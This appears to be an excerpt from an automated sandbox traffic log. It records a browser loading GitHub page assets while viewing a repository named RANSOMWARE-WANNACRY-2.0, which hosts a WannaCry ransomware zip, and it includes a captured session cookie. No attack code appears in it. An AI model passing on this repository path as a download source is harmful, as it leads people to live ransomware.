              Source: global trafficHTTP traffic detected: GET /assets/dark-a167e256da9c.css HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/primer-primitives-366b5c973fad.css HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/global-c2f8efb9bce8.css HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/primer-f3607eccaaae.css HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/github-19c85be4af9c.css HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/repository-6247ca238fd4.css HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/code-ad2fce00d003.css HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/react-code-view.959fb0b61e6a1de773e7.module.css HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/wp-runtime-5afb085e74be.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_dompurify_dist_purify_js-6890e890956f.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-7bd350d761f4.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/ui_packages_failbot_failbot_ts-5bd9ba639cc0.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/environment-27057bd9ed0b.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-086f7a27bac0.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-c76945c5961a.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_auto-complete-element-81d69b-d1813ba335d8.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-8a621df59e80.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b7d8f4-654130b7cde5.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-3959a9-68b3d6c8feb2.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/github-elements-369bd99876f6.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/element-registry-fb4b8d40f206.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-5a0e291a0298.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-5bff297a06de.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c91f4ad18b62.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/security/overall-count HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/fragment+htmlX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_scroll-anchoring_dist_scro-52dc4b-4fecca2d00e4.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_color-convert_index_js-72c9fbde5ad4.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-cbac5f-c7885f4526c5.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/app_assets_modules_github_updatable-content_ts-ee3fc84d7fb0.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-9de4213015af.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/security/overall-count HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no
